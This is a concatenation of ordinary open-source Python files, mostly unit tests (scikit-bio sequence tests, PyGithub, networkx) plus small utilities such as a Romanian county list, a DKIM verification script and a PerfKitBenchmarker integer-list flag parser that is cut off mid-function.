        return {"X": set("AB"), "Y": set("BC"), "Z": set("AC")}
    @classproperty
    def nondegenerate_chars(cls):
        return set("ABC")
class ExampleMotifsTester(ExampleIUPACSequence):
    """Fixture providing a fake _motifs mapping to exercise motif code paths."""
    @property
    def _motifs(self):
        # These aren't really motifs, just a way to excercise the code paths
        return {
            "name1": lambda x, _, __: str(x),
            "name2": lambda x, _, __: len(x)
        }
class TestIUPACSequence(TestCase):
    def setUp(self):
        # Shared mixed-case fixture; lowercase='key' records the case pattern
        # so it can be recovered via lowercase('key') in the tests below.
        self.lowercase_seq = ExampleIUPACSequence('AAAAaaaa', lowercase='key')
    def test_instantiation_with_no_implementation(self):
        # A subclass missing both abstract class properties cannot be
        # instantiated, and the error names the missing members.
        class IUPACSequenceSubclassNoImplementation(IUPACSequence):
            pass
        with self.assertRaises(TypeError) as cm:
            IUPACSequenceSubclassNoImplementation()
        self.assertIn("abstract class", str(cm.exception))
        self.assertIn("nondegenerate_chars", str(cm.exception))
        self.assertIn("degenerate_map", str(cm.exception))
    def test_init_default_parameters(self):
        # By default no metadata and no positional metadata are attached.
        seq = ExampleIUPACSequence('.-ABCXYZ')
        npt.assert_equal(seq.values, np.array('.-ABCXYZ', dtype='c'))
        self.assertFalse(seq.has_metadata())
        self.assertFalse(seq.has_positional_metadata())
    def test_init_nondefault_parameters(self):
        # Metadata and positional metadata supplied at construction are kept.
        seq = ExampleIUPACSequence('.-ABCXYZ',
                                   metadata={'id': 'foo'},
                                   positional_metadata={'quality': range(8)})
        npt.assert_equal(seq.values, np.array('.-ABCXYZ', dtype='c'))
        self.assertTrue(seq.has_metadata())
        self.assertEqual(seq.metadata['id'], 'foo')
        self.assertTrue(seq.has_positional_metadata())
        npt.assert_equal(seq.positional_metadata['quality'], np.array(range(8),
                                                                      dtype='int'))
    def test_init_valid_empty_sequence(self):
        # just make sure we can instantiate an empty sequence regardless of
        # `validate` and `lowercase` parameters. more extensive tests
        # are performed in Sequence base class unit tests
        for validate in (True, False):
            for lowercase in (True, False):
                seq = ExampleIUPACSequence('', validate=validate,
                                           lowercase=lowercase)
                self.assertEqual(seq, ExampleIUPACSequence(''))
    def test_init_valid_single_character_sequence(self):
        # One valid alphabet character works under all flag combinations.
        for validate in (True, False):
            for lowercase in (True, False):
                seq = ExampleIUPACSequence('C', validate=validate,
                                           lowercase=lowercase)
                self.assertEqual(seq, ExampleIUPACSequence('C'))
    def test_init_valid_multiple_character_sequence(self):
        # Mixed valid characters (gaps and degenerates included) also work.
        for validate in (True, False):
            for lowercase in (True, False):
                seq = ExampleIUPACSequence('BAACB.XYY-AZ', validate=validate,
                                           lowercase=lowercase)
                self.assertEqual(seq, ExampleIUPACSequence('BAACB.XYY-AZ'))
    def test_init_validate_parameter_single_character(self):
        # A character outside the alphabet is rejected, and the error
        # message names the offending character.
        seq = 'w'
        with six.assertRaisesRegex(self, ValueError, "character.*'w'"):
            ExampleIUPACSequence(seq)
        # test that we can instantiate an invalid sequence. we don't guarantee
        # anything working beyond instantiation
        ExampleIUPACSequence(seq, validate=False)
    def test_init_validate_parameter_multiple_characters(self):
        # mix of valid and invalid characters with repeats and lowercased
        # alphabet characters; the error lists the sorted unique offenders.
        seq = 'CBCBBbawCbbwBXYZ-.x'
        with six.assertRaisesRegex(self, ValueError, "\['a', 'b', 'w', 'x'\]"):
            ExampleIUPACSequence(seq)
        ExampleIUPACSequence(seq, validate=False)
    def test_init_lowercase_all_lowercase(self):
        # Lowercase input fails validation unless lowercase=True upcases it.
        s = 'cbcbbbazcbbzbxyz-.x'
        with six.assertRaisesRegex(self, ValueError,
                                   "\['a', 'b', 'c', 'x', 'y', 'z'\]"):
            ExampleIUPACSequence(s)
        seq = ExampleIUPACSequence(s, lowercase=True)
        self.assertEqual(seq, ExampleIUPACSequence('CBCBBBAZCBBZBXYZ-.X'))
    def test_init_lowercase_mixed_case(self):
        # Only the lowercase characters are reported and then upcased.
        s = 'CBCBBbazCbbzBXYZ-.x'
        with six.assertRaisesRegex(self, ValueError, "\['a', 'b', 'x', 'z'\]"):
            ExampleIUPACSequence(s)
        seq = ExampleIUPACSequence(s, lowercase=True)
        self.assertEqual(seq, ExampleIUPACSequence('CBCBBBAZCBBZBXYZ-.X'))
    def test_init_lowercase_no_validation(self):
        # lowercase=True still validates (upcased 'R' is invalid) unless
        # validation is switched off as well.
        s = 'car'
        with six.assertRaisesRegex(self, ValueError, "\['a', 'c', 'r'\]"):
            ExampleIUPACSequence(s)
        with six.assertRaisesRegex(self, ValueError, "character.*'R'"):
            ExampleIUPACSequence(s, lowercase=True)
        ExampleIUPACSequence(s, lowercase=True, validate=False)
    def test_init_lowercase_byte_ownership(self):
        # Constructing from a byte array with lowercase=True must copy the
        # bytes rather than upcasing the caller's buffer in place.
        bytes = np.array([97, 98, 97], dtype=np.uint8)
        with six.assertRaisesRegex(self, ValueError, "\['a', 'b'\]"):
            ExampleIUPACSequence(bytes)
        seq = ExampleIUPACSequence(bytes, lowercase=True)
        self.assertEqual(seq, ExampleIUPACSequence('ABA'))
        # should not share the same memory
        self.assertIsNot(seq._bytes, bytes)
        # we should have copied `bytes` before modifying in place to convert to
        # upper. make sure `bytes` hasn't been mutated
        npt.assert_equal(bytes, np.array([97, 98, 97], dtype=np.uint8))
    def test_init_lowercase_invalid_keys(self):
        # Unsupported types for the lowercase keyword raise a descriptive
        # TypeError naming the offending type.
        for invalid_key in ((), [], 2):
            invalid_type = type(invalid_key)
            with six.assertRaisesRegex(self, TypeError,
                                       "lowercase keyword argument expected "
                                       "a bool or string, but got %s" %
                                       invalid_type):
                ExampleIUPACSequence('ACGTacgt', lowercase=invalid_key)
    def test_lowercase_mungeable_key(self):
        # NOTE: This test relies on Sequence._munge_to_index_array working
        # properly. If the internal implementation of the lowercase method
        # changes to no longer use _munge_to_index_array, this test may need
        # to be updated to cover cases currently covered by
        # _munge_to_index_array
        self.assertEqual('AAAAaaaa', self.lowercase_seq.lowercase('key'))
    def test_lowercase_array_key(self):
        # NOTE: This test relies on Sequence._munge_to_index_array working
        # properly. If the internal implementation of the lowercase method
        # changes to no longer use _munge_to_index_array, this test may need
        # to be updated to cover cases currently covered by
        # _munge_to_index_array
        self.assertEqual('aaAAaaaa',
                         self.lowercase_seq.lowercase(
                             np.array([True, True, False, False, True, True,
                                       True, True])))
        self.assertEqual('AaAAaAAA',
                         self.lowercase_seq.lowercase([1, 4]))
    def test_degenerate_chars(self):
        # Each class property below returns a fresh copy: mutating the
        # returned set must not affect later reads, and assigning to the
        # property on an instance raises AttributeError.
        expected = set("XYZ")
        self.assertIs(type(ExampleIUPACSequence.degenerate_chars), set)
        self.assertEqual(ExampleIUPACSequence.degenerate_chars, expected)
        ExampleIUPACSequence.degenerate_chars.add("W")
        self.assertEqual(ExampleIUPACSequence.degenerate_chars, expected)
        self.assertEqual(ExampleIUPACSequence('').degenerate_chars, expected)
        with self.assertRaises(AttributeError):
            ExampleIUPACSequence('').degenerate_chars = set("BAR")
    def test_nondegenerate_chars(self):
        expected = set("ABC")
        self.assertEqual(ExampleIUPACSequence.nondegenerate_chars, expected)
        ExampleIUPACSequence.degenerate_chars.add("D")
        self.assertEqual(ExampleIUPACSequence.nondegenerate_chars, expected)
        self.assertEqual(ExampleIUPACSequence('').nondegenerate_chars,
                         expected)
        with self.assertRaises(AttributeError):
            ExampleIUPACSequence('').nondegenerate_chars = set("BAR")
    def test_gap_chars(self):
        expected = set(".-")
        self.assertIs(type(ExampleIUPACSequence.gap_chars), set)
        self.assertEqual(ExampleIUPACSequence.gap_chars, expected)
        ExampleIUPACSequence.gap_chars.add("_")
        self.assertEqual(ExampleIUPACSequence.gap_chars, expected)
        self.assertEqual(ExampleIUPACSequence('').gap_chars, expected)
        with self.assertRaises(AttributeError):
            ExampleIUPACSequence('').gap_chars = set("_ =")
    def test_alphabet(self):
        expected = set("ABC.-XYZ")
        self.assertIs(type(ExampleIUPACSequence.alphabet), set)
        self.assertEqual(ExampleIUPACSequence.alphabet, expected)
        ExampleIUPACSequence.alphabet.add("DEF")
        self.assertEqual(ExampleIUPACSequence.alphabet, expected)
        self.assertEqual(ExampleIUPACSequence('').alphabet, expected)
        with self.assertRaises(AttributeError):
            ExampleIUPACSequence('').alphabet = set("ABCDEFG.-WXYZ")
    def test_degenerate_map(self):
        # degenerate_map is also copy-on-read and read-only on instances.
        expected = {"X": set("AB"), "Y": set("BC"), "Z": set("AC")}
        self.assertEqual(ExampleIUPACSequence.degenerate_map, expected)
        ExampleIUPACSequence.degenerate_map['W'] = set("ABC")
        ExampleIUPACSequence.degenerate_map['X'] = set("CA")
        self.assertEqual(ExampleIUPACSequence.degenerate_map, expected)
        self.assertEqual(ExampleIUPACSequence('').degenerate_map, expected)
        with self.assertRaises(AttributeError):
            ExampleIUPACSequence('').degenerate_map = {'W': "ABC"}
def test_gaps(self):
self.assertIs(type(ExampleIUPACSequence("").gaps()), np.ndarray)
self.assertIs(ExampleIUPACSequence("").gaps().dtype, np.dtype('bool'))
npt.assert_equal(ExampleIUPACSequence("ABCXBZYABC").gaps(),
np.zeros(10).astype(bool))
npt.assert_equal(ExampleIUPACSequence(".-.-.").gaps(),
np.ones(5).astype(bool))
npt.assert_equal(ExampleIUPACSequence("A.B-C.X-Y.").gaps(),
np.array([0, 1] * 5, dtype=bool))
npt.assert_equal(ExampleIUPACSequence("AB.AC.XY-").gaps(),
np.array([0, 0, 1] * 3, dtype=bool))
npt.assert_equal(ExampleIUPACSequence("A.BC.-").gaps(),
np.array([0, 1, 0, 0, 1, 1], dtype=bool))
def test_has_gaps(self):
    """``has_gaps()`` returns a plain bool flagging any gap character."""
    # The result type is bool whether or not gaps are present.
    for text in ("", "-"):
        self.assertIs(type(ExampleIUPACSequence(text).has_gaps()), bool)

    for text in ("", "ABCXYZ"):
        self.assertFalse(ExampleIUPACSequence(text).has_gaps())
    for text in ("-", "ABCXYZ-"):
        self.assertTrue(ExampleIUPACSequence(text).has_gaps())
def test_degenerates(self):
    """``degenerates()`` returns a boolean ndarray flagging degenerate chars."""
    self.assertIs(type(ExampleIUPACSequence("").degenerates()), np.ndarray)
    self.assertIs(ExampleIUPACSequence("").degenerates().dtype,
                  np.dtype('bool'))

    # No degenerate characters present.
    npt.assert_equal(ExampleIUPACSequence("ABCBC-.AB.").degenerates(),
                     np.zeros(10).astype(bool))
    # All positions degenerate.
    npt.assert_equal(ExampleIUPACSequence("ZYZYZ").degenerates(),
                     np.ones(5).astype(bool))
    # Mixed patterns.
    npt.assert_equal(ExampleIUPACSequence("AX.Y-ZBXCZ").degenerates(),
                     np.array([0, 1] * 5, dtype=bool))
    npt.assert_equal(ExampleIUPACSequence("ABXACY.-Z").degenerates(),
                     np.array([0, 0, 1] * 3, dtype=bool))
    npt.assert_equal(ExampleIUPACSequence("AZBCXY").degenerates(),
                     np.array([0, 1, 0, 0, 1, 1], dtype=bool))
def test_has_degenerates(self):
    """``has_degenerates()`` returns a plain bool."""
    # The result type is bool in both the empty and degenerate cases.
    for text in ("", "X"):
        self.assertIs(type(ExampleIUPACSequence(text).has_degenerates()), bool)

    for text in ("", "A-.BC"):
        self.assertFalse(ExampleIUPACSequence(text).has_degenerates())
    for text in ("Z", "ABC.XYZ-"):
        self.assertTrue(ExampleIUPACSequence(text).has_degenerates())
def test_nondegenerates(self):
    """``nondegenerates()`` returns a boolean ndarray flagging concrete chars."""
    self.assertIs(type(ExampleIUPACSequence("").nondegenerates()),
                  np.ndarray)
    self.assertIs(ExampleIUPACSequence("").nondegenerates().dtype,
                  np.dtype('bool'))

    # Only degenerates and gaps: nothing flagged.
    npt.assert_equal(ExampleIUPACSequence("XYZYZ-.XY.").nondegenerates(),
                     np.zeros(10).astype(bool))
    # All positions non-degenerate.
    npt.assert_equal(ExampleIUPACSequence("ABABA").nondegenerates(),
                     np.ones(5).astype(bool))
    # Mixed patterns.
    npt.assert_equal(ExampleIUPACSequence("XA.B-AZCXA").nondegenerates(),
                     np.array([0, 1] * 5, dtype=bool))
    npt.assert_equal(ExampleIUPACSequence("XXAZZB.-C").nondegenerates(),
                     np.array([0, 0, 1] * 3, dtype=bool))
    npt.assert_equal(ExampleIUPACSequence("YB.-AC").nondegenerates(),
                     np.array([0, 1, 0, 0, 1, 1], dtype=bool))
def test_has_nondegenerates(self):
    """``has_nondegenerates()`` returns a plain bool."""
    # The result type is bool in both the empty and populated cases.
    for text in ("", "A"):
        self.assertIs(type(ExampleIUPACSequence(text).has_nondegenerates()),
                      bool)

    for text in ("", "X-.YZ"):
        self.assertFalse(ExampleIUPACSequence(text).has_nondegenerates())
    for text in ("C", ".XYZ-ABC"):
        self.assertTrue(ExampleIUPACSequence(text).has_nondegenerates())
def test_degap(self):
    """``degap()`` drops gap positions along with their positional metadata."""
    kw = {
        'metadata': {
            'id': 'some_id',
            'description': 'some description',
        },
    }

    # Empty sequence: degapping is a no-op.
    self.assertEqual(
        ExampleIUPACSequence("", positional_metadata={'qual': []},
                             **kw).degap(),
        ExampleIUPACSequence("", positional_metadata={'qual': []},
                             **kw))

    # No gaps present: sequence and metadata come back unchanged.
    self.assertEqual(
        ExampleIUPACSequence(
            "ABCXYZ",
            positional_metadata={'qual': np.arange(6)},
            **kw).degap(),
        ExampleIUPACSequence(
            "ABCXYZ",
            positional_metadata={'qual': np.arange(6)},
            **kw))

    # One internal gap: position 3 and its metadata entry are removed.
    self.assertEqual(
        ExampleIUPACSequence(
            "ABC-XYZ",
            positional_metadata={'qual': np.arange(7)},
            **kw).degap(),
        ExampleIUPACSequence(
            "ABCXYZ",
            positional_metadata={'qual': [0, 1, 2, 4, 5, 6]},
            **kw))

    # Leading, trailing and internal gaps of both kinds ('.' and '-').
    self.assertEqual(
        ExampleIUPACSequence(
            ".-ABC-XYZ.",
            positional_metadata={'qual': np.arange(10)},
            **kw).degap(),
        ExampleIUPACSequence(
            "ABCXYZ",
            positional_metadata={'qual': [2, 3, 4, 6, 7, 8]},
            **kw))

    # All gaps: result is empty, with an empty (but still typed) column.
    self.assertEqual(
        ExampleIUPACSequence(
            "---.-.-.-.-.",
            positional_metadata={'quality': np.arange(12)},
            **kw).degap(),
        ExampleIUPACSequence(
            "",
            positional_metadata={'quality': np.array([], dtype=np.int64)},
            **kw))
def test_expand_degenerates_no_degens(self):
    """A sequence without degenerate characters expands to only itself."""
    sequence = ExampleIUPACSequence("ABCABCABC")
    self.assertEqual(list(sequence.expand_degenerates()), [sequence])
def test_expand_degenerates_all_degens(self):
    """'XYZ' expands to the cartesian product of each position's members."""
    expected = [ExampleIUPACSequence(s)
                for s in ('ABA', 'ABC', 'ACA', 'ACC',
                          'BBA', 'BBC', 'BCA', 'BCC')]
    # Sort based on sequence string, as order is not guaranteed.
    observed = sorted(ExampleIUPACSequence('XYZ').expand_degenerates(),
                      key=str)
    self.assertEqual(observed, expected)
def test_expand_degenerates_with_metadata(self):
    """Metadata and positional metadata carry over to every expansion."""
    kw = {
        "metadata": {
            "id": "some_id",
            "description": "some description"
        },
        "positional_metadata": {
            "quality": np.arange(3),
        },
    }
    expected = [ExampleIUPACSequence(s, **kw)
                for s in ('ABA', 'ABC', 'BBA', 'BBC')]
    # Sort by sequence string, as expansion order is not guaranteed.
    observed = sorted(ExampleIUPACSequence('XBZ', **kw).expand_degenerates(),
                      key=str)
    self.assertEqual(observed, expected)
def test_to_regex_no_degens(self):
    """Without degenerates, the regex pattern is the sequence itself."""
    sequence = ExampleIUPACSequence('ABC')
    self.assertEqual(sequence.to_regex().pattern, str(sequence))
def test_to_regex_with_degens(self):
    """The regex matches exactly the expansions of the degenerate sequence."""
    pattern = ExampleIUPACSequence('AYZ').to_regex()
    # Every expansion (Y -> {B,C}, Z -> {A,C}) must match...
    self.assertFalse(any(pattern.match(s) is None
                         for s in ('ABA', 'ABC', 'ACA', 'ACC')))
    # ...and strings outside that set must not.
    self.assertTrue(all(pattern.match(s) is None
                        for s in ('CBA', 'BBA', 'ABB', 'AAA')))
def test_find_motifs_no_motif(self):
    """Unknown motif names raise ValueError naming the missing motif."""
    for sequence_cls in (ExampleMotifsTester, ExampleIUPACSequence):
        seq = sequence_cls("ABCABCABC")
        with self.assertRaises(ValueError) as cm:
            seq.find_motifs("doesn't-exist")
        self.assertIn("doesn't-exist", str(cm.exception))
def test_find_motifs(self):
    """Known motif names return that motif's computed result."""
    tester = ExampleMotifsTester("ABC")
    self.assertEqual(tester.find_motifs("name1"), "ABC")
    self.assertEqual(tester.find_motifs("name2"), 3)
def test_repr(self):
    """Sanity-check the custom ``__repr__`` stats for each content mix."""
    # basic sanity checks for custom repr stats. more extensive testing is
    # performed on Sequence.__repr__

    # minimal
    obs = repr(ExampleIUPACSequence(''))
    self.assertEqual(obs.count('\n'), 7)
    self.assertTrue(obs.startswith('ExampleIUPACSequence'))
    self.assertIn('length: 0', obs)
    self.assertIn('has gaps: False', obs)
    self.assertIn('has degenerates: False', obs)
    self.assertIn('has non-degenerates: False', obs)
    self.assertTrue(obs.endswith('-'))

    # no metadata, mix of gaps, degenerates, and non-degenerates
    obs = repr(ExampleIUPACSequence('AY-B'))
    self.assertEqual(obs.count('\n'), 8)
    self.assertTrue(obs.startswith('ExampleIUPACSequence'))
    self.assertIn('length: 4', obs)
    self.assertIn('has gaps: True', obs)
    self.assertIn('has degenerates: True', obs)
    self.assertIn('has non-degenerates: True', obs)
    self.assertTrue(obs.endswith('0 AY-B'))

    # metadata and positional metadata of mixed types
    obs = repr(
        ExampleIUPACSequence(
            'ABCA',
            metadata={'foo': 42, u'bar': 33.33, None: True, False: {},
                      (1, 2): 3, 'acb' * 100: "'"},
            positional_metadata={'foo': range(4),
                                 42: ['a', 'b', [], 'c']}))
    self.assertEqual(obs.count('\n'), 18)
    self.assertTrue(obs.startswith('ExampleIUPACSequence'))
    self.assertIn('None: True', obs)
    self.assertIn('\'foo\': 42', obs)
    self.assertIn('42: <dtype: object>', obs)
    self.assertIn('\'foo\': <dtype: int64>', obs)
    self.assertIn('length: 4', obs)
    self.assertIn('has gaps: False', obs)
    self.assertIn('has degenerates: False', obs)
    self.assertIn('has non-degenerates: True', obs)
    self.assertTrue(obs.endswith('0 ABCA'))

    # sequence spanning > 5 lines
    obs = repr(ExampleIUPACSequence('A' * 301))
    self.assertEqual(obs.count('\n'), 12)
    self.assertTrue(obs.startswith('ExampleIUPACSequence'))
    self.assertIn('length: 301', obs)
    self.assertIn('has gaps: False', obs)
    self.assertIn('has degenerates: False', obs)
    self.assertIn('has non-degenerates: True', obs)
    # Long sequences include an elision marker.
    self.assertIn('...', obs)
    self.assertTrue(obs.endswith('300 A'))
if __name__ == "__main__":
    # Run the unittest test runner when this file is executed as a script.
    main()
|
DavidWhittingham/agsadmin | refs/heads/develop | agsadmin/sharing_admin/portals/RolesResponse.py | 1 | from __future__ import (absolute_import, division, print_function, unicode_literals)
from builtins import (ascii, bytes, chr, dict, filter, hex, input, int, map, next, oct, open, pow, range, round, str,
super, zip)
class RolesResponse(object):
    """Read-only container for one page of a roles listing response."""

    def __init__(self, start, num, total, next_start, roles):
        super().__init__()
        self._start = start
        self._num = num
        self._total = total
        self._next_start = next_start
        self._roles = roles

    @property
    def start(self):
        """Index of the first entry in this page."""
        return self._start

    @property
    def num(self):
        """Number of entries requested for this page."""
        return self._num

    @property
    def total(self):
        """Total number of entries across all pages."""
        return self._total

    @property
    def next_start(self):
        """Start index to use when requesting the following page."""
        return self._next_start

    @property
    def roles(self):
        """The role records contained in this page."""
        return self._roles
|
crwilcox/PyGithub | refs/heads/master | github/tests/GitRef.py | 39 | # -*- coding: utf-8 -*-
# ########################## Copyrights and license ############################
# #
# Copyright 2012 Vincent Jacques <vincent@vincent-jacques.net> #
# Copyright 2012 Zearin <zearin@gonk.net> #
# Copyright 2013 Vincent Jacques <vincent@vincent-jacques.net> #
# #
# This file is part of PyGithub. http://jacquev6.github.com/PyGithub/ #
# #
# PyGithub is free software: you can redistribute it and/or modify it under #
# the terms of the GNU Lesser General Public License as published by the Free #
# Software Foundation, either version 3 of the License, or (at your option) #
# any later version. #
# #
# PyGithub is distributed in the hope that it will be useful, but WITHOUT ANY #
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS #
# FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more #
# details. #
# #
# You should have received a copy of the GNU Lesser General Public License #
# along with PyGithub. If not, see <http://www.gnu.org/licenses/>. #
# #
# ##############################################################################
import Framework
class GitRef(Framework.TestCase):
    """Tests for git reference objects (run against recorded API fixtures)."""

    def setUp(self):
        Framework.TestCase.setUp(self)
        # A branch ref created ahead of time in the test repository.
        self.ref = self.g.get_user().get_repo("PyGithub").get_git_ref("heads/BranchCreatedByPyGithub")

    def testAttributes(self):
        # Expected values mirror the recorded API responses for this ref.
        self.assertEqual(self.ref.object.sha, "1292bf0e22c796e91cc3d6e24b544aece8c21f2a")
        self.assertEqual(self.ref.object.type, "commit")
        self.assertEqual(self.ref.object.url, "https://api.github.com/repos/jacquev6/PyGithub/git/commits/1292bf0e22c796e91cc3d6e24b544aece8c21f2a")
        self.assertEqual(self.ref.ref, "refs/heads/BranchCreatedByPyGithub")
        self.assertEqual(self.ref.url, "https://api.github.com/repos/jacquev6/PyGithub/git/refs/heads/BranchCreatedByPyGithub")

    def testEdit(self):
        # Point the ref at a new commit sha (fast-forward).
        self.ref.edit("04cde900a0775b51f762735637bd30de392a2793")

    def testEditWithForce(self):
        # Non-fast-forward update requires force=True.
        self.ref.edit("4303c5b90e2216d927155e9609436ccb8984c495", force=True)

    def testDelete(self):
        self.ref.delete()
|
psawaya/Mental-Ginger | refs/heads/master | django/contrib/localflavor/ro/ro_counties.py | 428 | # -*- coding: utf-8 -*-
"""
A list of Romanian counties as `choices` in a formfield.
This exists as a standalone file so that it's only imported into memory when
explicitly needed.
"""
# (code, localized name) pairs, one per Romanian county, suitable for a
# form field's ``choices``. Ordered alphabetically by name; Bucharest uses
# the single-letter code 'B'.
COUNTIES_CHOICES = (
    ('AB', u'Alba'),
    ('AR', u'Arad'),
    ('AG', u'Argeş'),
    ('BC', u'Bacău'),
    ('BH', u'Bihor'),
    ('BN', u'Bistriţa-Năsăud'),
    ('BT', u'Botoşani'),
    ('BV', u'Braşov'),
    ('BR', u'Brăila'),
    ('B', u'Bucureşti'),
    ('BZ', u'Buzău'),
    ('CS', u'Caraş-Severin'),
    ('CL', u'Călăraşi'),
    ('CJ', u'Cluj'),
    ('CT', u'Constanţa'),
    ('CV', u'Covasna'),
    ('DB', u'Dâmboviţa'),
    ('DJ', u'Dolj'),
    ('GL', u'Galaţi'),
    ('GR', u'Giurgiu'),
    ('GJ', u'Gorj'),
    ('HR', u'Harghita'),
    ('HD', u'Hunedoara'),
    ('IL', u'Ialomiţa'),
    ('IS', u'Iaşi'),
    ('IF', u'Ilfov'),
    ('MM', u'Maramureş'),
    ('MH', u'Mehedinţi'),
    ('MS', u'Mureş'),
    ('NT', u'Neamţ'),
    ('OT', u'Olt'),
    ('PH', u'Prahova'),
    ('SM', u'Satu Mare'),
    ('SJ', u'Sălaj'),
    ('SB', u'Sibiu'),
    ('SV', u'Suceava'),
    ('TR', u'Teleorman'),
    ('TM', u'Timiş'),
    ('TL', u'Tulcea'),
    ('VS', u'Vaslui'),
    ('VL', u'Vâlcea'),
    ('VN', u'Vrancea'),
)
|
vvv1559/intellij-community | refs/heads/master | python/testData/refactoring/inlinelocal/py994.before.py | 83 | class C:
def foo(self):
co<caret>nf = Conference()
return conf |
thepropterhoc/Cha_The_Pivot | refs/heads/master | app/node_modules/mailin/python/verifydkim.py | 9 | #!/usr/bin/env python
"""
Given a raw email message on stdin, verify its dkim signature. Exit with code 11
if the signature is not valid.
"""
import dkim
import os
import sys
def main():
    """Read a raw email message from stdin and verify its DKIM signature.

    Prints the verification result and exits with code 11 when the
    signature does not validate.
    """
    msg = sys.stdin.read()
    # dkim.verify returns a truthy value iff the signature checks out.
    # (The former ``res = None`` pre-assignment was a dead store.)
    res = dkim.verify(msg)
    print('[' + os.path.basename(__file__) + '] isDkimValid = ' + str(res))
    if not res:
        # Invalid signature, exit with code 11.
        sys.exit(11)

if __name__ == '__main__':
    main()
|
ReganBell/QReview | refs/heads/master | networkx/algorithms/tests/test_distance_regular.py | 87 | #!/usr/bin/env python
from nose.tools import *
import networkx as nx
class TestDistanceRegular:
    """Tests for distance-regularity predicates and intersection arrays."""

    def test_is_distance_regular(self):
        # Well-known distance-regular graphs must be recognized...
        assert_true(nx.is_distance_regular(nx.icosahedral_graph()))
        assert_true(nx.is_distance_regular(nx.petersen_graph()))
        assert_true(nx.is_distance_regular(nx.cubical_graph()))
        assert_true(nx.is_distance_regular(nx.complete_bipartite_graph(3,3)))
        assert_true(nx.is_distance_regular(nx.tetrahedral_graph()))
        assert_true(nx.is_distance_regular(nx.dodecahedral_graph()))
        assert_true(nx.is_distance_regular(nx.pappus_graph()))
        assert_true(nx.is_distance_regular(nx.heawood_graph()))
        assert_true(nx.is_distance_regular(nx.cycle_graph(3)))
        # no distance regular
        assert_false(nx.is_distance_regular(nx.path_graph(4)))

    def test_not_connected(self):
        # A disconnected graph can never be distance regular.
        G=nx.cycle_graph(4)
        G.add_cycle([5,6,7])
        assert_false(nx.is_distance_regular(G))

    def test_global_parameters(self):
        # Global parameters (c_i, a_i, b_i) derived from the intersection array.
        b,c=nx.intersection_array(nx.cycle_graph(5))
        g=nx.global_parameters(b,c)
        assert_equal(list(g),[(0, 0, 2), (1, 0, 1), (1, 1, 0)])
        b,c=nx.intersection_array(nx.cycle_graph(3))
        g=nx.global_parameters(b,c)
        assert_equal(list(g),[(0, 0, 2), (1, 1, 0)])

    def test_intersection_array(self):
        # Expected (b, c) arrays for several classic graphs.
        b,c=nx.intersection_array(nx.cycle_graph(5))
        assert_equal(b,[2, 1])
        assert_equal(c,[1, 1])
        b,c=nx.intersection_array(nx.dodecahedral_graph())
        assert_equal(b,[3, 2, 1, 1, 1])
        assert_equal(c,[1, 1, 1, 2, 3])
        b,c=nx.intersection_array(nx.icosahedral_graph())
        assert_equal(b,[5, 2, 1])
        assert_equal(c,[1, 2, 5])
|
kivio/PerfKitBenchmarker | refs/heads/master | perfkitbenchmarker/flag_util.py | 4 | # Copyright 2015 PerfKitBenchmarker Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utility functions for working with user-supplied flags."""
import logging
import numbers
import re

from perfkitbenchmarker import flags
INTEGER_GROUP_REGEXP = re.compile(r'(\d+)(-(\d+))?$')
class IntegerList(object):
    """An immutable list of nonnegative integers.

    The list contains either single integers (ex: 5) or ranges (ex: 8-12).
    Ranges are stored as (low, high) tuples, so the memory required to hold
    a range does not grow with the size of the range.

    Make a list with

      lst = IntegerList(groups)

    where groups is a list whose elements are either single integers or
    2-tuples holding the low and high bounds of a range (inclusive).
    (Ex: [5, (8,12)] represents the integer list 5,8,9,10,11,12.)
    """

    def __init__(self, groups):
        self.groups = groups

        # Pre-compute the flattened element count so __len__ is O(1).
        length = 0
        for elt in groups:
            # numbers.Integral covers both int and (on Python 2) long,
            # which keeps this module working on Python 2 and 3 alike.
            if isinstance(elt, numbers.Integral):
                length += 1
            if isinstance(elt, tuple):
                length += elt[1] - elt[0] + 1
        self.length = length

    def __len__(self):
        return self.length

    def __getitem__(self, idx):
        """Return the idx-th integer of the flattened list.

        Raises:
          TypeError: if idx is not an int.
          IndexError: if idx is out of range.
        """
        if not isinstance(idx, int):
            raise TypeError()
        if idx < 0 or idx >= self.length:
            raise IndexError()

        # Walk the groups, consuming idx elements as we go; a range group
        # accounts for (high - low + 1) elements at once.
        group_idx = 0
        while idx > 0:
            group = self.groups[group_idx]

            if not isinstance(group, tuple):
                group_idx += 1
                idx -= 1
            else:
                group_len = group[1] - group[0] + 1
                if idx >= group_len:
                    group_idx += 1
                    idx -= group_len
                else:
                    return group[0] + idx

        # idx reached 0: the answer is the first element of this group.
        if isinstance(self.groups[group_idx], tuple):
            return self.groups[group_idx][0]
        else:
            return self.groups[group_idx]

    def __iter__(self):
        """Yield every integer, expanding range groups lazily."""
        for group in self.groups:
            if isinstance(group, numbers.Integral):
                yield group
            else:
                low, high = group
                # range() works on both Python 2 and 3 (unlike the former
                # Python 2-only xrange); per-group ranges are small.
                for val in range(low, high + 1):
                    yield val
class IntegerListParser(flags.ArgumentParser):
    """Parse a string containing a comma-separated list of nonnegative integers.

    The list may contain single integers and dash-separated ranges. For
    example, "1,3,5-7" parses to [1,3,5,6,7].

    Can pass the flag on_nonincreasing to the constructor to tell it
    what to do if the list is nonincreasing. Options are
      - None: do nothing.
      - IntegerListParser.WARN: log a warning.
      - IntegerListParser.EXCEPTION: raise a ValueError.

    As a special case, instead of a string, can pass a list of integers
    or an IntegerList. In these cases, the return value iterates over
    the same integers as were in the argument.
    """

    syntactic_help = ('A comma-separated list of nonnegative integers or integer '
                      'ranges. Ex: 1,3,5-7 is read as 1,3,5,6,7.')

    WARN = 'warn'
    EXCEPTION = 'exception'

    def __init__(self, on_nonincreasing=None):
        super(IntegerListParser, self).__init__()

        self.on_nonincreasing = on_nonincreasing

    def Parse(self, inp):
        """Parse an integer list.

        Args:
          inp: a string, a list, or an IntegerList.

        Returns:
          An iterable of integers.

        Raises:
          ValueError if inp doesn't follow a format it recognizes.
        """

        if isinstance(inp, IntegerList):
            return inp
        elif isinstance(inp, list):
            return IntegerList(inp)

